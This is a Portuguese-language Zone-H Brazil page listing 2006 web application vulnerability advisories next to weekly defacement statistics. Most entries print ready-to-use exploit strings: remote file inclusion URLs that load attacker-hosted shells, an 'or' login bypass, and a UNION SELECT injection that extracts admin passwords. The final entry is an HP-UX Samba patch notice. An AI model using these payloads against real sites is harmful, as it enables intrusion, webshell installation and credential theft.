Zone-H Advertisement
Home arrow Avisos de Segurança
03 de December de 2008
 
 
Ataques desta semana
O.S.  Defs.  %
Linux  4747  66.95%
Win 2003  1457  20.55%
Solaris 9/10  351  4.95%
FreeBSD  229  3.23%
Win 2000  164  2.31%
Other  142  2.00%

Total de ataques: 7090 dos quais 3494 único(s) no ip e 3596 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Área de Download
Zone-H.org
Área de download
Avisos de Segurança
Dimension of phpBB: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
06 de October de 2006
Nome do Script: Dimension of phpBB
Site do script: http://www.phpbb-dimension.de
Versão Afetada: 0.2.5

Encontrado por SpiderZ
Site: www.spiderz.altervista.org

Exploração:

http://site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]
 
Phponline : Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 1
06 de October de 2006
Nome do Script: Phponline
Site do script: http://www.dayanahost.com/file/phponline_2.1.1.zip
Versão Afetada: Não Especificada
Encontrado por MoHaNdKo
Email: xp1o_at_msn.com

Exploração:

http://sitename.com/[scerpitPath]/strload.php?LangFile=http://SHELLURL.COM
 
HazirSite: Injeção de SQL Imprimir E-mail
Avaliação do Usuário: / 1
06 de October de 2006
Nome do Script: HazirSite
Site do script: http://www.aspindir.com/indir.asp?id=2728
Versão Afetada: 2.0

Encontrado por Dj ReMix
Email: dj_remix_20_at_hotmail.com

Exploração:

Usuario: 'or'
Senha: 'or'

Pagina de Administração:

http://victim.com/[path to script]/idare.asp
 
PHP Classifieds: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
05 de October de 2006

Nome do Script: PHP Classifieds
Site do script: www.deltascripts.com/phpclassifieds
Versão Afetada: 7.1

Encontrado por Kzar
Email: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo

Exploração:

search.php?catid_search=[sql]
index.php?catid=[sql]

Exemplo:

index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins
 

 
Travelsized CMS: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
04 de October de 2006
Nome do Script: Travelsized CMS
Site do script: http://prdownloads.sourceforge.net/uberghey/travelsized-0.4.tar.bz2?download
Versão Afetada: 0.4

Encontrado pelo Polonês Kacper (a.k.a Rahim)
Email: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo

Exploração:

http://www.site.com/[Travelsized_path]/frontpage.php?setup_folder=http://server/shell.txt?
 
Bug no HP-UX CIFS Server(Samba) permite acesso não autorizado Imprimir E-mail
Avaliação do Usuário: / 1
03 de October de 2006

a Security-Alert Hp Com. informou hoje sobre uma falha no HP-UX CIFS Server (Samba) que permite acesso não autorizado e privilégios elevados.

 Versões Afetadas:

HP-UX B.11.11

HP-UX B.11.23

E todas as versões até A.02.02.01 são afetadas.

Solução:

A HP forneceu a atualização do software para resolver esse bug, HP-UX CIFS Server (Samba) version A.02.03, que pode ser baixada no site http://software.hp.com

 

 
<< Início < Anterior 1 2 3 4 5 6 7 8 9 Próximo > Fim >>

Resultados 183 - 208 de 234
 
Top! Top!